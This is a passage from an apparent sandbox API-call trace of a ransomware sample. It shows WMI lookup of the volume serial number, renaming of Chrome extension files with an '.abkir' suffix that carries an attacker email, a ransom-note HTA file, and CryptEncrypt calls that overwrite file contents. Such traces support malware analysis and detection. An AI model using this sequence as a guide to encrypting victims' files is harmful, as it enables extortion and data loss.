[5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e72c | out: ppvObject=0x949e72c*=0x60272c0) returned 0x0 [0205.045] WbemLocator:IUnknown:Release (This=0x6023bd0) returned 0x0 [0205.045] WbemLocator:IUnknown:QueryInterface (in: This=0x60272c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e34c | out: ppvObject=0x949e34c*=0x60272c0) returned 0x0 [0205.045] WbemLocator:IUnknown:QueryInterface (in: This=0x60272c0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e308 | out: ppvObject=0x949e308*=0x0) returned 0x80004002 [0205.045] WbemLocator:IUnknown:AddRef (This=0x60272c0) returned 0x3 [0205.045] WbemLocator:IUnknown:QueryInterface (in: This=0x60272c0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dc64 | out: ppvObject=0x949dc64*=0x0) returned 0x80004002 [0205.045] WbemLocator:IUnknown:QueryInterface (in: This=0x60272c0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dc14 | out: ppvObject=0x949dc14*=0x0) returned 0x80004002 [0205.045] WbemLocator:IUnknown:QueryInterface (in: This=0x60272c0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dc20 | out: ppvObject=0x949dc20*=0x0) returned 0x80004002 [0205.045] CoGetContextToken (in: pToken=0x949dc80 | out: pToken=0x949dc80) returned 0x0 [0205.045] CoGetContextToken (in: pToken=0x949e088 | out: pToken=0x949e088) returned 0x0 [0205.045] WbemLocator:IUnknown:QueryInterface (in: This=0x60272c0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e118 | out: ppvObject=0x949e118*=0x0) returned 0x80004002 [0205.045] WbemLocator:IUnknown:Release (This=0x60272c0) returned 0x2 [0205.045] WbemLocator:IUnknown:Release (This=0x60272c0) returned 0x1 [0205.045] CoGetContextToken (in: pToken=0x949e6f8 | out: pToken=0x949e6f8) returned 0x0 [0205.045] CoGetContextToken (in: pToken=0x949e658 | out: pToken=0x949e658) returned 0x0 [0205.045] WbemLocator:IUnknown:QueryInterface (in: This=0x60272c0, riid=0x949e728*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x949e724 | out: ppvObject=0x949e724*=0x60272c0) returned 0x0 [0205.045] WbemLocator:IUnknown:AddRef (This=0x60272c0) returned 0x3 [0205.045] WbemLocator:IUnknown:Release (This=0x60272c0) returned 0x2 [0205.045] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a90, puCount=0x949e8bc | out: puCount=0x949e8bc*=0x2) returned 0x0 [0205.045] WbemDefPath:IWbemPath:GetText (in: This=0x6030a90, lFlags=8, puBuffLength=0x949e8b8*=0x0, pszText=0x0 | out: puBuffLength=0x949e8b8*=0xf, pszText=0x0) returned 0x0 [0205.046] WbemDefPath:IWbemPath:GetText (in: This=0x6030a90, lFlags=8, puBuffLength=0x949e8b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e8b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0205.046] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x949e794 | out: ppv=0x949e794*=0x60272d0) returned 0x0 [0205.046] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60272d0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x949e828 | out: ppNamespace=0x949e828*=0x6033164) returned 0x0 [0205.162] WbemLocator:IUnknown:QueryInterface (in: This=0x6033164, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e6c4 | out: ppvObject=0x949e6c4*=0xb5b404) returned 0x0 [0205.162] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b404, pProxy=0x6033164, pAuthnSvc=0x949e714, pAuthzSvc=0x949e710, pServerPrincName=0x949e708, pAuthnLevel=0x949e70c, pImpLevel=0x949e6fc, pAuthInfo=0x949e700, pCapabilites=0x949e704 | out: pAuthnSvc=0x949e714*=0xa, pAuthzSvc=0x949e710*=0x0, pServerPrincName=0x949e708, pAuthnLevel=0x949e70c*=0x6, pImpLevel=0x949e6fc*=0x2, pAuthInfo=0x949e700, pCapabilites=0x949e704*=0x1) returned 0x0 [0205.162] WbemLocator:IUnknown:Release (This=0xb5b404) returned 0x1 [0205.162] WbemLocator:IUnknown:QueryInterface (in: This=0x6033164, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e6b8 | out: ppvObject=0x949e6b8*=0xb5b424) returned 0x0 [0205.162] WbemLocator:IUnknown:QueryInterface (in: This=0x6033164, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e6b4 | out: ppvObject=0x949e6b4*=0xb5b404) returned 0x0 [0205.162] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b404, pProxy=0x6033164, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0205.163] WbemLocator:IUnknown:Release (This=0xb5b404) returned 0x2 [0205.163] WbemLocator:IUnknown:Release (This=0xb5b424) returned 0x1 [0205.163] CoTaskMemFree (pv=0xbd4918) [0205.163] WbemLocator:IUnknown:Release (This=0x60272d0) returned 0x0 [0205.163] WbemLocator:IUnknown:QueryInterface (in: This=0x6033164, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e2b4 | out: ppvObject=0x949e2b4*=0xb5b424) returned 0x0 [0205.163] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e270 | out: ppvObject=0x949e270*=0x0) returned 0x80004002 [0205.163] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e08c | out: ppvObject=0x949e08c*=0x0) returned 0x80004002 [0205.164] WbemLocator:IUnknown:AddRef (This=0xb5b424) returned 0x3 [0205.164] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dbcc | out: ppvObject=0x949dbcc*=0x0) returned 0x80004002 [0205.164] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949db7c | out: ppvObject=0x949db7c*=0x0) returned 0x80004002 [0205.164] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949db88 | out: ppvObject=0x949db88*=0xb5b384) returned 0x0 [0205.164] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b384, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949db90 | out: pCid=0x949db90*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0205.164] WbemLocator:IUnknown:Release (This=0xb5b384) returned 0x3 [0205.164] CoGetContextToken (in: pToken=0x949dbe8 | out: pToken=0x949dbe8) returned 0x0 [0205.164] CoGetContextToken (in: pToken=0x949dff0 | out: pToken=0x949dff0) returned 0x0 [0205.164] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e080 | out: ppvObject=0x949e080*=0xb5b40c) returned 0x0 [0205.164] WbemLocator:IRpcOptions:Query (in: This=0xb5b40c, pPrx=0xb5b424, dwProperty=2, pdwValue=0x949e0a8 | out: pdwValue=0x949e0a8) returned 0x80004002 [0205.165] WbemLocator:IUnknown:Release (This=0xb5b40c) returned 0x3 [0205.165] WbemLocator:IUnknown:Release (This=0xb5b424) returned 0x2 [0205.165] CoGetContextToken (in: pToken=0x949e5c8 | out: pToken=0x949e5c8) returned 0x0 [0205.165] CoGetContextToken (in: pToken=0x949e528 | out: pToken=0x949e528) returned 0x0 [0205.165] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x949e5f8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x949e5f4 | out: ppvObject=0x949e5f4*=0x6033164) returned 0x0 [0205.165] WbemLocator:IUnknown:AddRef (This=0x6033164) returned 0x4 [0205.165] WbemLocator:IUnknown:Release (This=0x6033164) returned 0x3 [0205.165] WbemLocator:IUnknown:Release (This=0x6033164) returned 0x2 [0205.165] SysStringLen (param_1=0x0) returned 0x0 [0205.165] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030860, puCount=0x949e98c | out: puCount=0x949e98c*=0x0) returned 0x0 [0205.165] WbemDefPath:IWbemPath:GetText (in: This=0x6030860, lFlags=2, puBuffLength=0x949e988*=0x0, pszText=0x0 | out: puBuffLength=0x949e988*=0x20, pszText=0x0) returned 0x0 [0205.165] WbemDefPath:IWbemPath:GetText (in: This=0x6030860, lFlags=2, puBuffLength=0x949e988*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e988*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0205.165] CoGetContextToken (in: pToken=0x949e5f8 | out: pToken=0x949e5f8) returned 0x0 [0205.165] WbemLocator:IUnknown:AddRef (This=0xb5b424) returned 0x3 [0205.165] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e48c | out: ppvObject=0x949e48c*=0xb5b424) returned 0x0 [0205.165] WbemLocator:IUnknown:Release (This=0xb5b424) returned 0x3 [0205.165] WbemLocator:IUnknown:Release (This=0xb5b424) returned 0x2 [0205.165] WbemDefPath:IWbemPath:GetText (in: This=0x6030860, lFlags=2, puBuffLength=0x949e990*=0x0, pszText=0x0 | out: puBuffLength=0x949e990*=0x20, pszText=0x0) returned 0x0 [0205.165] WbemDefPath:IWbemPath:GetText (in: This=0x6030860, lFlags=2, puBuffLength=0x949e990*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e990*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0205.166] IWbemServices:GetObject (in: This=0x6033164, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x949e944*=0x0, ppCallResult=0x0 | out: ppObject=0x949e944*=0x6027fe8, ppCallResult=0x0) returned 0x0 [0205.189] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a90, puCount=0x949e944 | out: puCount=0x949e944*=0x2) returned 0x0 [0205.189] WbemDefPath:IWbemPath:GetText (in: This=0x6030a90, lFlags=4, puBuffLength=0x949e940*=0x0, pszText=0x0 | out: puBuffLength=0x949e940*=0xf, pszText=0x0) returned 0x0 [0205.189] WbemDefPath:IWbemPath:GetText (in: This=0x6030a90, lFlags=4, puBuffLength=0x949e940*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e940*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0205.189] IWbemClassObject:Get (in: This=0x6027fe8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e940*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3636838*=0, plFlavor=0x363683c*=0 | out: pVal=0x949e940*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3636838*=8, plFlavor=0x363683c*=0) returned 0x0 [0205.189] SysStringByteLen (bstr="9C354B42") returned 0x10 [0205.189] SysStringByteLen (bstr="9C354B42") returned 0x10 [0205.189] IWbemClassObject:Get (in: This=0x6027fe8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e948*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3636838*=8, plFlavor=0x363683c*=0 | out: pVal=0x949e948*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3636838*=8, plFlavor=0x363683c*=0) returned 0x0 [0205.189] SysStringByteLen (bstr="9C354B42") returned 0x10 [0205.189] SysStringByteLen (bstr="9C354B42") returned 0x10 [0205.189] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html", nBufferLength=0x105, lpBuffer=0x949e548, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html", lpFilePart=0x0) returned 0x87 [0205.190] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x949e548, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0xaa [0205.190] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9a8) returned 1 [0205.190] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html"), fInfoLevelId=0x0, lpFileInformation=0x949ea24 | out: lpFileInformation=0x949ea24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b74730, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x33e52a60, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0205.190] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9a4) returned 1 [0205.190] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0205.191] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js", nBufferLength=0x105, lpBuffer=0x949e560, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js", lpFilePart=0x0) returned 0x85 [0205.191] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e568, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\info-decrypt.hta", lpFilePart=0x0) returned 0x8e [0205.191] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9c8) returned 1 [0205.191] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x949ea44 | out: lpFileInformation=0x949ea44*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x31f86dc0, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x31f86dc0, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x31f86dc0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0205.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9c4) returned 1 [0205.192] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js", nBufferLength=0x105, lpBuffer=0x949e568, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js", lpFilePart=0x0) returned 0x85 [0205.192] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea14) returned 1 [0205.192] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js"), fInfoLevelId=0x0, lpFileInformation=0x363728c | out: lpFileInformation=0x363728c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b998f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b9b830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xe4180700, ftLastWriteTime.dwHighDateTime=0x1d03f5e, nFileSizeHigh=0x0, nFileSizeLow=0x5f)) returned 1 [0205.456] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea10) returned 1 [0205.456] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js", nBufferLength=0x105, lpBuffer=0x949e454, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js", lpFilePart=0x0) returned 0x85 [0205.456] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e948) returned 1 [0205.456] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0205.457] GetFileType (hFile=0x31c) returned 0x1 [0205.457] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e944) returned 1 [0205.457] GetFileType (hFile=0x31c) returned 0x1 [0205.457] GetFileSize (in: hFile=0x31c, lpFileSizeHigh=0x949ea50 | out: lpFileSizeHigh=0x949ea50*=0x0) returned 0x5f [0205.457] ReadFile (in: hFile=0x31c, lpBuffer=0x365f2f4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x949e9fc, lpOverlapped=0x0 | out: lpBuffer=0x365f2f4*, lpNumberOfBytesRead=0x949e9fc*=0x5f, lpOverlapped=0x0) returned 1 [0205.458] CloseHandle (hObject=0x31c) returned 1 [0205.459] CryptAcquireContextW (in: phProv=0x949e99c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x949e99c*=0xbdf508) returned 1 [0205.460] CryptGenRandom (in: hProv=0xbdf508, dwLen=0x10, pbBuffer=0x3660648 | out: pbBuffer=0x3660648) returned 1 [0205.980] CryptImportKey (in: hProv=0xbdf508, pbData=0x3849188, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x949e96c | out: phKey=0x949e96c*=0xb7f4d0) returned 1 [0205.980] CryptContextAddRef (hProv=0xbdf508, pdwReserved=0x0, dwFlags=0x0) returned 1 [0205.980] CryptContextAddRef (hProv=0xbdf508, pdwReserved=0x0, dwFlags=0x0) returned 1 [0205.981] CryptDuplicateKey (in: hKey=0xb7f4d0, pdwReserved=0x0, dwFlags=0x0, phKey=0x949e95c | out: phKey=0x949e95c*=0xb7f1d0) returned 1 [0205.981] CryptContextAddRef (hProv=0xbdf508, pdwReserved=0x0, dwFlags=0x0) returned 1 [0205.981] CryptSetKeyParam (hKey=0xb7f1d0, dwParam=0x4, pbData=0x3849268*=0x1, dwFlags=0x0) returned 1 [0205.981] CryptSetKeyParam (hKey=0xb7f1d0, dwParam=0x1, pbData=0x3849234, dwFlags=0x0) returned 1 [0205.981] CryptEncrypt (in: hKey=0xb7f1d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3849278*, pdwDataLen=0x949e9c8*=0x60, dwBufLen=0x60 | out: pbData=0x3849278*, pdwDataLen=0x949e9c8*=0x60) returned 1 [0205.981] CryptEncrypt (in: hKey=0xb7f1d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x38492fc*, pdwDataLen=0x949e9d0*=0x0, dwBufLen=0x10 | out: pbData=0x38492fc*, pdwDataLen=0x949e9d0*=0x10) returned 1 [0205.982] CryptDestroyKey (hKey=0xb7f4d0) returned 1 [0205.983] CryptReleaseContext (hProv=0xbdf508, dwFlags=0x0) returned 1 [0205.983] CryptReleaseContext (hProv=0xbdf508, dwFlags=0x0) returned 1 [0205.983] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js", nBufferLength=0x105, lpBuffer=0x949e440, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js", lpFilePart=0x0) returned 0x85 [0205.983] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e934) returned 1 [0205.983] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x32c [0206.105] GetFileType (hFile=0x32c) returned 0x1 [0206.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e930) returned 1 [0206.105] GetFileType (hFile=0x32c) returned 0x1 [0206.105] WriteFile (in: hFile=0x32c, lpBuffer=0x36153d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x949e9c4, lpOverlapped=0x0 | out: lpBuffer=0x36153d8*, lpNumberOfBytesWritten=0x949e9c4*=0x20, lpOverlapped=0x0) returned 1 [0206.106] CloseHandle (hObject=0x32c) returned 1 [0206.107] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0206.107] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0206.107] 